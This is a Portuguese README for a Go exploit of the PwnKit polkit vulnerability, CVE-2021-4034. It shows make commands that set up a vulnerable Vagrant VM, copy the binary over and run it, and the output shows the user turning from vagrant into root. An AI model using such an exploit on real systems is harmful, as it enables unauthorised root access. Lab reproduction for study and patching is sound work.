
Exploit para a vulnerabilidade PwnKit, CVE-2021-4034, escrito em Go
Este é um exploit funcional para a vulnerabilidade pwnkit, CVE-2021-4034, escrito em Go
Experimente:
# crie uma máquina vagrant vulnerável
$ make vm
...
# compile o binário e envie-o via scp para a máquina vagrant
$ make scp
# acesse a máquina vagrant via ssh
$ make ssh
# O usuário padrão é "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# execute o exploit
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root